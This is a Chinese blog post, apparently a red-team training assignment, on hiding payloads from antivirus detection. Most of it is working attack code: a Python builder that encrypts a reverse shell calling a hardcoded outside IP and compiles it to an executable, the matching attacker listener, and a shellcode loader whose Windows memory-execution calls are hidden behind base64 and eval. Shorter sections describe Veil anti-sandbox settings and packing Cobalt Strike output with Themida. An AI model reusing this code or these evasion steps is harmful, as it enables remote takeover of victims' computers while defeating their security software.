红队培训班作业 | 混淆&反沙盒机制&隐藏shellcode 过杀软静态检测
红队培训班作业 | 混淆&反沙盒机制&隐藏shellcode 过杀软静态检测
Ms08067安全实验室
发布于 2021-09-28 14:55:04
发布于 2021-09-28 14:55:04
本文作者:某学员A(红队培训班2期学员)
1、加密或编码或混淆过杀软静态检测
l 如下代码为实现payload经过fernet对称加密的shellcode生成器:
#coding:utf-8
#run by victim
from cryptography.fernet import Fernet
import os
payload=b'''
import socket, subprocess
remote_ip='8.129.211.1'
remote_port=12345
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
s.connect((remote_ip,remote_port))
while True:
data=s.recv(2048)
if data=='quit' or data=='exit' or data=='': break
result=subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
s.send(result.stdout.read()+result.stderr.read())
s.close()
'''
print('Now, Encrypting......')
fernet1=Fernet(Fernet.generate_key())
encoded_payload=fernet1.encrypt(bytes(payload))
file1=open('shellcode.py','w+')
file1.write('from cryptography.fernet import Fernet'+'\n'+
'fernet1=Fernet(Fernet.generate_key())'+'\n'+
'encoded_payload='+encoded_payload+'\n'+
'exec(fernet1.decrypt(encoded_payload))')
file1.close()
print('Encryption Complete.')
print('Now, Compiling......')
os.system('pyinstaller -F shellcode.py --noconsole')
print('Compile Complete.')
#run by hacker
'''
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
local_ip=''
local_port=12345
s.bind((local_ip, local_port))
s.listen(20)
print('Listening...')
(conn, addr)=s.accept()
print('Connected by', addr)
while True:
cmd=raw_input('Shell:')
conn.send(cmd)
if cmd=='quit' or cmd=='exit' or cmd=='': break
data=conn.recv(2048)
print data
conn.close()
'''windows defender检测结果:
360检测结果:
l 通过base64对关键win32 API函数执行语句进行编码:
#coding:utf-8
#run by victim
import ctypes, base64
payload = b""
payload += b"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b"
payload += b"\x52\x30\x8b\x52\x0c\x8b\x52\x14\x0f\xb7\x4a\x26\x8b"
payload += b"\x72\x28\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20"
payload += b"\xc1\xcf\x0d\x01\xc7\x49\x75\xef\x52\x8b\x52\x10\x8b"
payload += b"\x42\x3c\x01\xd0\x57\x8b\x40\x78\x85\xc0\x74\x4c\x01"
payload += b"\xd0\x8b\x58\x20\x8b\x48\x18\x50\x01\xd3\x85\xc9\x74"
payload += b"\x3c\x31\xff\x49\x8b\x34\x8b\x01\xd6\x31\xc0\xc1\xcf"
payload += b"\x0d\xac\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d"
payload += b"\x24\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b"
payload += b"\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
payload += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"
payload += b"\x12\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00\x00\x68"
payload += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff"
payload += b"\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80"
payload += b"\x6b\x00\xff\xd5\x6a\x0a\x68\x08\x81\xd3\x01\x68\x02"
payload += b"\x00\x30\x39\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
payload += b"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68"
payload += b"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08"
payload += b"\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57"
payload += b"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b"
payload += b"\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"
payload += b"\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"
payload += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68"
payload += b"\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff"
payload += b"\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c"
payload += b"\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01"
payload += b"\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00"
payload += b"\x53\xff\xd5"
payload=bytearray(payload)
ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_int
buf=(ctypes.c_char*len(payload)).from_buffer(payload)
# ptr=ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(payload)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
eval(base64.b64decode('cHRyPWN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jKGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KGxlbihwYXlsb2FkKSksIGN0eXBlcy5jX2ludCgweDMwMDApLCBjdHlwZXMuY19pbnQoMHg0MCkp'))
# ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(payload)))
eval(base64.b64decode('Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX2ludChwdHIpLCBidWYsIGN0eXBlcy5jX2ludChsZW4ocGF5bG9hZCkpKQ=='))
# handler=ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
eval(base64.b64decode('aGFuZGxlcj1jdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZChjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KHB0ciksIGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KDApLCBjdHlwZXMucG9pbnRlcihjdHlwZXMuY19pbnQoMCkpKQ=='))
# ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handler), ctypes.c_int(-1))
eval(base64.b64decode('Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGVyKSwgY3R5cGVzLmNfaW50KC0xKSk='))windows defender检测结果:
360检测结果:
2、添加反沙盒机制过杀软动态检测
在kali linux中下载veil-evasion(sudo apt-get install veil)并以silent方式安装,通过veil命令打开:
生成免杀payload:
通过set命令设置lhost、lport、minram、sleep、detectdebug、sandboxprocess等参数后,如下所示:
通过generate命令生成payload,包括payload.py(靶机端运行)和payload.rc(攻击端MSF运行):
3、隐藏或编码shellcode过特征检测
将Cobalt Strike生成的反弹shell进行themida加壳处理:
360检测结果:
windows defender检测结果:
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-09-07,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录